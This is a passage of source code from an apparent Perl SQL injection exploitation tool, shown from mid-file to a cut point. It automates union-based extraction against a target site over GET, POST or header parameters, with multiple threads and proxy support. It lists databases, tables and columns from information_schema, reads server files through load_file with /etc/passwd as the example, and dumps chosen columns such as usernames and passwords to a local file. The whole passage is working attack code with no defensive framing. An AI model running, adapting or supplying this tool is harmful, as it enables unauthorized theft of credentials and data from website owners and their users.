  593.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "schema_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.schemata";
  594.      $num = -1; # ?? ????????
  595.      $thr = $kol_threads; # ???-?? ???????
  596.      print "Request method - $method\n";
  597.      print "Threads - $kol_threads\n";
  598.      print "Proxy - $proxy_message\n";
  599.      print "----------------------\n";
  600.       for(0..$thr) {
  601.          $trl[$_] = threads->create(\&gets5050);
  602.      }
  603.      for(0..$thr) {
  604.          $trl[$_]->join;
  605.      }
  606.      sub gets5050 {
  607.        $| = 1;
  608.        while ($num<=$bd_num) {
  609.          { lock($num);
  610.          $num++; }
  611.          if($sql_flag == 0){
  612.               $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  613.               $content = scan_url();
  614.             } elsif ($sql_flag == 1) {#POST
  615.               $current = $source_sql;
  616.               $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  617.               $content = scan_url_POST();
  618.             } elsif($sql_flag == 2){#HEADER
  619.               $current = $source_sql;
  620.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  621.               $sql_header_query =~ s!\Q$search!$replacement!g;
  622.               $content = scan_url_HEADER();
  623.            }
  624.          if ($content =~ m/ussr(.*?)ussr/img) {
  625.                   print $1 . "\n";
  626.                   print FILE $1 . "\n";
  627.          }
  628.          print $num . "\r";
  629.          sleep $pause;
  630.  
  631.        }
  632.      }
  633.     print "----------\n";
  634.     print "Saved in " . "z_" . $host . ".txt\n";
  635.     close(FILE);
  636.     goto START;
  637. }
  638. if ($choice == 3) {
  639.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  640.      print "-----------------------------------------\n";
  641.      print "Enter the DB-name: ";
  642.      $choice = <STDIN>;
  643.      chomp $choice;
  644.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  645.      print "DB-name: $choice\n";
  646.      print "----------\n";
  647.      $choice1 = ascii_to_hex $choice;
  648.      ## ???-?? tables ? information_schema.schemata ##
  649.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
  650.      if($sql_flag == 0){
  651.          $current = $url11;
  652.          $content = scan_url();
  653.      } elsif ($sql_flag == 1) {#POST
  654.          $current = $source_sql;
  655.          $sql_post = $url11;
  656.          $content = scan_url_POST();
  657.      } elsif($sql_flag == 2){#HEADER
  658.               $current = $source_sql;
  659.               $sql_header_query = $url11;
  660.               $sql_header_query =~ s!\Q$search!$replacement!g;
  661.               $content = scan_url_HEADER();
  662.      }
  663.      $current = $url11;
  664.      $tab_num1 = $content;
  665.      $tab_num1 =~ m/ussr(.*?)ussr/img;
  666.      $tab_num1 = $1;
  667.      print FILE "-----------------------------------------\n";
  668.      print FILE "Tables in DB [$choice]: $tab_num1\n";
  669.      print FILE "-----------------------------------------\n";
  670.      print "-----------------------------------------\n";
  671.      print "Tables in DB [$choice]: $tab_num1\n";
  672.      print "-----------------------------------------\n";
  673.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 ;
  674.      $num = -1; # ?? ????????
  675.      $thr = $kol_threads; # ???-?? ???????
  676.      print "Request method - $method\n";
  677.      print "Threads - $kol_threads\n";
  678.      print "Proxy - $proxy_message\n";
  679.      print "----------------------\n";
  680.       for(0..$thr) {
  681.          $trl[$_] = threads->create(\&gets5051);
  682.      }
  683.      for(0..$thr) {
  684.          $trl[$_]->join;
  685.      }
  686.      sub gets5051 {
  687.        $| = 1;
  688.        while ($num<$tab_num1) {
  689.          { lock($num);
  690.          $num++; }
  691.          if($sql_flag == 0){
  692.             $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  693.             $content = scan_url();
  694.          } elsif ($sql_flag == 1) {#POST
  695.             $current = $source_sql;
  696.             $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  697.             $content = scan_url_POST();
  698.          } elsif($sql_flag == 2){#HEADER
  699.               $current = $source_sql;
  700.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  701.               $sql_header_query =~ s!\Q$search!$replacement!g;
  702.               $content = scan_url_HEADER();
  703.          }
  704.          if ($content =~ m/ussr(.*?)ussr/img) {
  705.                   print $1 . "\n";
  706.                   print FILE $1 . "\n";
  707.          }
  708.          print $num . "\r";
  709.          sleep $pause;
  710.  
  711.        }
  712.      }
  713.     print "----------\n";
  714.     print "Saved in " . "z_" . $host . ".txt\n";
  715.     close(FILE);
  716.     goto START;
  717. }
  718. if ($choice == 13) {
  719.      M_LOAD_FILE:
  720.      open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  721.      print "-----------------------------------------\n";
  722.      print "Enter file name (example: /etc/passwd) or type <exit> for main menu: ";
  723.      $choice = <STDIN>;
  724.      chomp $choice;
  725.      if ($choice eq "exit") {close(FILE);goto START;}
  726.      print "File name for read: $choice\n";
  727.      $choice1 = ascii_to_hex $choice;
  728.      if($sql_flag == 0){
  729.          $current = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  730.          $content = scan_url();
  731.      } elsif ($sql_flag == 1) {#POST
  732.          $current = $source_sql;
  733.          $sql_post = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  734.          $content = scan_url_POST();
  735.      } elsif($sql_flag == 2){#HEADER
  736.               $current = $source_sql;
  737.               $sql_header_query = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  738.               $sql_header_query =~ s!\Q$search!$replacement!g;
  739.               $content = scan_url_HEADER();
  740.      }
  741.      if ($content =~ m/ussr(.*?)ussr/imgs) {
  742.             print "\n\n\n" . $1 . "\n";
  743.             print FILE $1 . "\n";
  744.      }
  745.      print "----------\n";
  746.      print "Saved in " . "z_" . $host . ".txt\n";
  747.      close(FILE);
  748.      goto M_LOAD_FILE;
  749. }
  750. if ($choice == 4) {
  751.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  752.      print "-----------------------------------------\n";
  753.      print "Enter the DB-name: ";
  754.      $choice = <STDIN>;
  755.      chomp $choice;
  756.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  757.      print "DB-name: $choice\n";
  758.      print "----------\n";
  759.      $choice1 = ascii_to_hex $choice;
  760.      print "-----------------------------------------\n";
  761.      print "Enter the TABLE-name: ";
  762.      $choice2 = <STDIN>;
  763.      chomp $choice2;
  764.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  765.      print "TABLE-name: $choice2\n";
  766.      print "----------\n";
  767.      $choice3 = ascii_to_hex $choice2;
  768.      $url11 = $sql_start . $sql_pref1 . "count(column_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
  769.     if($sql_flag == 0){
  770.          $current = $url11;
  771.          $content = scan_url();
  772.      } elsif ($sql_flag == 1) {#POST
  773.          $current = $source_sql;
  774.          $sql_post = $url11;
  775.          $content = scan_url_POST();
  776.      } elsif($sql_flag == 2){#HEADER
  777.               $current = $source_sql;
  778.               $sql_header_query = $url11;
  779.               $sql_header_query =~ s!\Q$search!$replacement!g;
  780.               $content = scan_url_HEADER();
  781.      }
  782.      $col_num1 = $content;
  783.      $col_num1 =~ m/ussr(.*?)ussr/img;
  784.      $col_num1 = $1;
  785.      print FILE "-----------------------------------------\n";
  786.      print FILE "Columns in [$choice.$choice2]: $col_num1\n";
  787.      print FILE "-----------------------------------------\n";
  788.      print "-----------------------------------------\n";
  789.      print "Columns in [$choice.$choice2]: $col_num1\n";
  790.      print "-----------------------------------------\n";
  791.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1;
  792.      $num = -1; # ?? ????????
  793.      $thr = $kol_threads; # ???-?? ???????
  794.      print "Request method - $method\n";
  795.      print "Threads - $kol_threads\n";
  796.      print "Proxy - $proxy_message\n";
  797.      print "----------------------\n";
  798.       for(0..$thr) {
  799.          $trl[$_] = threads->create(\&gets5052);
  800.      }
  801.      for(0..$thr) {
  802.          $trl[$_]->join;
  803.      }
  804.      sub gets5052 {
  805.        $| = 1;
  806.        while ($num<$col_num1) {
  807.          { lock($num);
  808.          $num++; }
  809.          if($sql_flag == 0){
  810.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  811.            $content = scan_url();
  812.          } elsif ($sql_flag == 1) {#POST
  813.            $current = $source_sql;
  814.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  815.            $content = scan_url_POST();
  816.          } elsif($sql_flag == 2){#HEADER
  817.               $current = $source_sql;
  818.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  819.               $sql_header_query =~ s!\Q$search!$replacement!g;
  820.               $content = scan_url_HEADER();
  821.          }
  822.          if ($content =~ m/ussr(.*?)ussr/img) {
  823.                   print $1 . "\n";
  824.                   print FILE $1 . "\n";
  825.          }
  826.          print $num . "\r";
  827.          sleep $pause;
  828.  
  829.        }
  830.      }
  831.     print "----------\n";
  832.     print "Saved in " . "z_" . $host . ".txt\n";
  833.     close(FILE);
  834.     goto START;
  835. }
  836. #################################################################################
  837. if ($choice == 5) {
  838.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  839.      ## ???-?? ?????? ? information_schema.tables ##
  840.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $limit . $filtr; # ??????? ???-?? ??????
  841.      if($sql_flag == 0){
  842.          $current = $url11;
  843.          $content = scan_url();
  844.      } elsif ($sql_flag == 1) {#POST
  845.          $current = $source_sql;
  846.          $sql_post = $url11;
  847.          $content = scan_url_POST();
  848.      } elsif($sql_flag == 2){#HEADER
  849.               $current = $source_sql;
  850.               $sql_header_query = $url11;
  851.               $sql_header_query =~ s!\Q$search!$replacement!g;
  852.               $content = scan_url_HEADER();
  853.      }  
  854.      $tab_num = $content;
  855.      $tab_num =~ m/ussr(.*?)ussr/imgs;
  856.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
  857.      print "-----------------------------------------\n";
  858.      print "Tables in information_schema.tables - $1\n";
  859.      print "-----------------------------------------\n";
  860.      ## start from2 ##
  861.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  862.      $choice = <STDIN>;
  863.      chomp $choice;
  864.      $thr = $kol_threads; # ???-?? ???????
  865.      if ($choice == 1) {
  866.           $num = -1; # ?? ????????
  867.      } else {
  868.           print "Enter START_position: ";
  869.           $choice1 = <STDIN>;
  870.           chomp $choice1;
  871.           $num = $choice1-2;
  872.           print "Enter END_position: ";
  873.           $choice2 = <STDIN>;
  874.           chomp $choice2;
  875.           $tab_num = $choice2-1;
  876.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  877.      }
  878.      print "-----------------------------------------\n";
  879.      ## end from2
  880.      print FILE  "-----------------------------------------\n";
  881.      print FILE  "Tables in information_schema.tables - $1\n";
  882.      print FILE  "-----------------------------------------\n";
  883.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables";
  884.      print "Request method - $method\n";
  885.      print "Threads - $kol_threads\n";
  886.      print "Proxy - $proxy_message\n";
  887.      print "----------------------\n";
  888.      for(0..$thr) {
  889.          $trl[$_] = threads->create(\&gets);
  890.      }
  891.      for(0..$thr) {
  892.          $trl[$_]->join;
  893.      }
  894.      sub gets {
  895.        $| = 1;
  896.        while ($num<$tab_num) {
  897.          { lock($num);
  898.          $num++; }
  899.          if($sql_flag == 0){
  900.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  901.            $content = scan_url();
  902.          } elsif ($sql_flag == 1) {#POST
  903.            $current = $source_sql;
  904.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  905.            $content = scan_url_POST();
  906.         } elsif($sql_flag == 2){#HEADER
  907.               $current = $source_sql;
  908.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  909.               $sql_header_query =~ s!\Q$search!$replacement!g;
  910.               $content = scan_url_HEADER();
  911.         }  
  912.          if ($content =~ m/ussr(.*?)ussr/img) {
  913.                   print $1 . "\n";
  914.                   print FILE $1 . "\n";
  915.          }
  916.          print $num . "\r";
  917.          sleep $pause;
  918.  
  919.        }
  920.      }
  921.     print "----------\n";
  922.     print "Saved in " . "z_" . $host . ".txt\n";
  923.     close(FILE);
  924.     goto START;
  925. }
  926. if ($choice == 6) {
  927.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  928.     print "-----------------------------------------\n";
  929.     print "Enter the table_name: ";
  930.     $choice = <STDIN>;
  931.     chomp $choice;
  932.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  933.     print "Table: $choice\n";
  934.     print "----------\n";
  935.     print FILE  "-----------------------------------------\n";
  936.     print FILE  "Table [ $choice ]\n";
  937.     print FILE  "-----------------------------------------\n";
  938.     $choice1 = ascii_to_hex $choice;
  939.     $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  940.     if($sql_flag == 0){
  941.          $current = $url13;
  942.          $content = scan_url();
  943.      } elsif ($sql_flag == 1) {#POST
  944.          $current = $source_sql;
  945.          $sql_post = $url13;
  946.          $content = scan_url_POST();
  947.     } elsif($sql_flag == 2){#HEADER
  948.               $current = $source_sql;
  949.               $sql_header_query = $url13;
  950.               $sql_header_query =~ s!\Q$search!$replacement!g;
  951.               $content = scan_url_HEADER();
  952.     }  
  953.     $prefix = $content;
  954.     $prefix =~ m/ussr(.*?)ussr/img;
  955.     $prefix = $1; # ??, ? ??????? ???????
  956.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  957.     print "Database for $choice: $prefix\n";
  958.     print FILE  "Database for $choice: $prefix\n";
  959.     $url14 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  960.     if($sql_flag == 0){
  961.          $current = $url14;
  962.          $content = scan_url();
  963.      } elsif ($sql_flag == 1) {#POST
  964.          $current = $source_sql;
  965.          $sql_post = $url14;
  966.          $content = scan_url_POST();
  967.      } elsif($sql_flag == 2){#HEADER
  968.               $current = $source_sql;
  969.               $sql_header_query = $url14;
  970.               $sql_header_query =~ s!\Q$search!$replacement!g;
  971.               $content = scan_url_HEADER();
  972.     }  
  973.     $colum_number = $content;
  974.     $colum_number =~ m/ussr(.*?)ussr/img;
  975.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
  976.     $full_table_name = $prefix . "." . $choice;
  977.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
  978.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
  979.     print "----------\n";
  980.     ## ?????? ??????? ##
  981.     $thr = $kol_threads; # ???-?? ???????
  982.     $num = -1; # ?? ????????
  983.     print "Request method - $method\n";
  984.     print "Threads - $kol_threads\n";
  985.     print "Proxy - $proxy_message\n";
  986.     print "----------------------\n";
  987.     $url15 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1;
  988.     print FILE  "Columns in " . $full_table_name . "\n";
  989.     for(0..$thr) {
  990.          $trl[$_] = threads->create(\&gets2);
  991.     }
  992.     for(0..$thr) {
  993.          $trl[$_]->join;
  994.     }
  995.     sub gets2 {
  996.        $| = 1;
  997.        while ($num<$colum_number) {
  998.          { lock($num);
  999.          $num++; }
  1000.          if($sql_flag == 0){
  1001.             $current = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1002.             $content = scan_url();
  1003.          } elsif ($sql_flag == 1) {#POST
  1004.             $current = $source_sql;
  1005.             $sql_post = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1006.             $content = scan_url_POST();
  1007.         } elsif($sql_flag == 2){#HEADER
  1008.               $current = $source_sql;
  1009.               $sql_header_query = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1010.               $sql_header_query =~ s!\Q$search!$replacement!g;
  1011.               $content = scan_url_HEADER();
  1012.         }  
  1013.          if ($content =~ m/ussr(.*?)ussr/img) {
  1014.                   print "   " . $1 . "\n";
  1015.                   print FILE "  "  . $1 . "\n";
  1016.          }
  1017.          print $num . "\r";
  1018.          sleep $pause;
  1019.  
  1020.        }
  1021.     }
  1022.     print FILE "----------\n";
  1023.     print "----------\n";
  1024.     print "Saved in " . "z_" . $host . ".txt\n";
  1025.     close(FILE);
  1026.     goto START;
  1027. }
  1028. if ($choice == 7) {
  1029.     sub ascii_to_hex ($) {
  1030.              (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  1031.              $str = "0x" . $str;
  1032.              return $str;
  1033.     }
  1034.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  1035.     if ($full_table_name) {
  1036.        print "-----------------------------------------\n";
  1037.        print "Use last parsed table: $full_table_name ? (1/0): ";
  1038.        $choice = <STDIN>;
  1039.        chomp $choice;
  1040.        if ($choice==1) {
  1041.              $table_name = $full_table_name;
  1042.              print "Table: $table_name\n";
  1043.              print "----------\n";
  1044.        } else {
  1045.              print "-----------------------------------------\n";
  1046.              print "Enter the table_name: ";
  1047.              $choice = <STDIN>;
  1048.              chomp $choice;
  1049.              if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1050.              $table_name = $choice;
  1051.              if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
  1052.              print "-----------------------------------------\n";
  1053.              print "MySQL>=5 or MySql<5? (1/0): ";
  1054.              $choice = <STDIN>;
  1055.              chomp $choice;
  1056.              if ($choice == 1) {
  1057.                   $choice1 = ascii_to_hex $table_name;
  1058.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  1059.                   if($sql_flag == 0){
  1060.                     $current = $url13;
  1061.                     $content = scan_url();
  1062.                   } elsif ($sql_flag == 1) {#POST
  1063.                     $current = $source_sql;
  1064.                     $sql_post = $url13;
  1065.                     $content = scan_url_POST();
  1066.                   } elsif($sql_flag == 2){#HEADER
  1067.                     $current = $source_sql;
  1068.                     $sql_header_query = $url13;
  1069.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1070.                     $content = scan_url_HEADER();
  1071.                   }  
  1072.                   $prefix = $content;
  1073.                   $prefix =~ m/ussr(.*?)ussr/img;
  1074.                   $prefix = $1; # ??, ? ??????? ???????
  1075.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1076.                   $table_name = "`" . $prefix . "." . $table_name . "`";
  1077.              }
  1078.              print "Table: $table_name\n";
  1079.              print "----------\n";
  1080.        }
  1081.     } else {
  1082.        print "-----------------------------------------\n";
  1083.        print "Enter the table_name: ";
  1084.        $choice = <STDIN>;
  1085.        chomp $choice;
  1086.        $table_name = $choice;
  1087.        if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
  1088.        print "-----------------------------------------\n";
  1089.        print "MySQL>=5 or MySql<5? [if DBname.TableName - 0] (1/0): ";
  1090.        $choice = <STDIN>;
  1091.        chomp $choice;
  1092.        if ($choice == 1) {
  1093.                   $choice1 = ascii_to_hex $table_name;
  1094.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  1095.                    if($sql_flag == 0){
  1096.                     $current = $url13;
  1097.                     $content = scan_url();
  1098.                   } elsif ($sql_flag == 1) {#POST
  1099.                     $current = $source_sql;
  1100.                     $sql_post = $url13;
  1101.                     $content = scan_url_POST();
  1102.                   } elsif($sql_flag == 2){#HEADER
  1103.                     $current = $source_sql;
  1104.                     $sql_header_query = $url13;
  1105.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1106.                     $content = scan_url_HEADER();
  1107.                   }  
  1108.                   $prefix = $content;
  1109.                   $prefix =~ m/ussr(.*?)ussr/img;
  1110.                   $prefix = $1; # ??, ? ??????? ???????
  1111.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1112.                   $table_name = $prefix . "." . $table_name;
  1113.        }
  1114.        print "Table: $table_name\n";
  1115.        print "----------\n";
  1116.     }
  1117.     print "-----------------------------------------\n";
  1118.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  1119.     $choice = <STDIN>;
  1120.     chomp $choice;
  1121.     $column_name = $choice;
  1122.     print FILE  "-----------------------------------------\n";
  1123.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  1124.     print FILE  "-----------------------------------------\n";
  1125.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  1126.     print "-----------------------------------------\n";
  1127.     print "Do you want add condition to sql-query?\n";
  1128.     print "----------\n";
  1129.     print "for example - where id=1, where username=admin (no quotes)  ? (1/0): ";
  1130.     $choice = <STDIN>;
  1131.     chomp $choice;
  1132.     if ($choice==1) {
  1133.         print "-----------------------------------------\n";
  1134.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  1135.         print "----------\n";
  1136.         $choice = <STDIN>;
  1137.         chomp $choice;
  1138.  
  1139.         $where = $choice;
  1140.         # ?????????:
  1141.         ($con,$whe) = split(/=/,$where);
  1142.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
  1143.         print "Your condition: [ where $where ]\n";
  1144.         $condition=1;
  1145.     } else {
  1146.         $condition=0;
  1147.     }
  1148.     if ($condition==0) {
  1149.          print "----------\n";
  1150.          ## ?????? ???-?? ???????? ?? ??????? #
  1151.          print "Count data from [ $table_name  ]\n";
  1152.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $limit . $filtr;
  1153.          if($sql_flag == 0){
  1154.               $current = $url16;
  1155.               $content = scan_url();
  1156.          } elsif ($sql_flag == 1) {#POST
  1157.               $current = $source_sql;
  1158.               $sql_post = $url16;
  1159.               $content = scan_url_POST();
  1160.          } elsif($sql_flag == 2){#HEADER
  1161.                     $current = $source_sql;
  1162.                     $sql_header_query = $url16;
  1163.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1164.                     $content = scan_url_HEADER();
  1165.          }  
  1166.          $column_name_p = $content;
  1167.          $column_name_p =~ m/ussr(.*?)ussr/img;
  1168.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  1169.          print "$column_name_p\n";
  1170.          print "----------\n";
  1171.          ## start from2 ##
  1172.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  1173.          $choice = <STDIN>;
  1174.          chomp $choice;
  1175.          $thr = $kol_threads; # ???-?? ???????
  1176.          if ($choice == 1) {
  1177.               $num = -1; # ?? ????????
  1178.          } else {
  1179.               print "Enter START_position: ";
  1180.               $choice1 = <STDIN>;
  1181.               chomp $choice1;
  1182.               $num = $choice1-2;
  1183.               print "Enter END_position: ";
  1184.               $choice2 = <STDIN>;
  1185.               chomp $choice2;
  1186.               $column_name_p = $choice2-1;
  1187.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  1188.          }
  1189.          print "-----------------------------------------\n";
  1190.          print "Request method - $method\n";
  1191.          print "Threads - $kol_threads\n";
  1192.          print "Proxy - $proxy_message\n";
  1193.          print "----------------------\n";
  1194.          ## end from2
  1195.          ## ?????? ?????? ?? ??????? ##
  1196.          $url17 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . $table_name;
  1197.          for(0..$thr) {
  1198.              $trl[$_] = threads->create(\&gets4);
  1199.          }
  1200.          for(0..$thr) {
  1201.              $trl[$_]->join;
  1202.          }
  1203.          sub gets4 {
  1204.             $| = 1;
  1205.             while ($num<$column_name_p) {
  1206.                { lock($num);
  1207.                $num++; }
  1208.                if($sql_flag == 0){
  1209.                   $current = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1210.                   $content = scan_url();
  1211.                } elsif ($sql_flag == 1) {#POST
  1212.                   $current = $source_sql;
  1213.                   $sql_post = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1214.                   $content = scan_url_POST();
  1215.                } elsif($sql_flag == 2){#HEADER
  1216.                     $current = $source_sql;
  1217.                     $sql_header_query = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1218.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1219.                     $content = scan_url_HEADER();
  1220.                }  
  1221.                if ($content =~ m/ussr(.*?)ussr/img) {
  1222.                     print "   " . $1 . "\n";
  1223.                     print FILE "  "  . $1 . "\n";
  1224.                }
  1225.                print $num . "\r";
  1226.                sleep $pause;
  1227.  
  1228.             }
  1229.          }
  1230.     print "----------\n";
  1231.     print "Saved in " . "z_" . $host . ".txt\n";
  1232.     close(FILE);
  1233.     goto START;
  1234.     } else {
  1235.     ## ?????? ?????? ?? ??????? ##
  1236.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  1237.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where . $limit . $filtr;
  1238.          if($sql_flag == 0){
  1239.                $current = $url16;
  1240.                $content = scan_url();
  1241.          } elsif ($sql_flag == 1) {#POST
  1242.                $current = $source_sql;
  1243.                $sql_post = $url16;
  1244.                $content = scan_url_POST();
  1245.          } elsif($sql_flag == 2){#HEADER
  1246.                     $current = $source_sql;
  1247.                     $sql_header_query = $url16;
  1248.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1249.                     $content = scan_url_HEADER();
  1250.          }  
  1251.          $column_name_p = $content;
  1252.          $column_name_p =~ m/ussr(.*?)ussr/img;
  1253.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  1254.          print "$column_name_p\n";
  1255.          print "----------\n";
  1256.          ## start from2 ##
  1257.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
  1258.          $choice = <STDIN>;
  1259.          chomp $choice;
  1260.          $thr = $kol_threads; # ???-?? ???????
  1261.          if ($choice == 1) {
  1262.               $num = -1; # ?? ????????
  1263.          } else {
  1264.               print "Enter START_position: ";
  1265.               $choice1 = <STDIN>;
  1266.               chomp $choice1;
  1267.               $num = $choice1-2;
  1268.               print "Enter END_position: ";
  1269.               $choice2 = <STDIN>;
  1270.               chomp $choice2;
  1271.               $column_name_p = $choice2-1;
  1272.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  1273.          }
  1274.          print "-----------------------------------------\n";
  1275.          print "Request method - $method\n";
  1276.          print "Threads - $kol_threads\n";
  1277.          print "Proxy - $proxy_message\n";
  1278.          print "----------------------\n";
  1279.          ## end from2
  1280.          $url18 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where;
  1281.          for(0..$thr) {
  1282.              $trl[$_] = threads->create(\&gets5);
  1283.          }
  1284.          for(0..$thr) {
  1285.              $trl[$_]->join;
  1286.          }
  1287.          sub gets5 {
  1288.             $| = 1;
  1289.             while ($num<$column_name_p) {
  1290.                { lock($num);
  1291.                $num++; }
  1292.                if($sql_flag == 0){
  1293.                   $current = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1294.                   $content = scan_url();
  1295.                }elsif ($sql_flag == 1) {#POST
  1296.                   $current = $source_sql;
  1297.                   $sql_post = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1298.                   $content = scan_url_POST();
  1299.                } elsif($sql_flag == 2){#HEADER
  1300.                     $current = $source_sql;
  1301.                     $sql_header_query = $url18 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1302.                     $sql_header_query =~ s!\Q$search!$replacement!g;
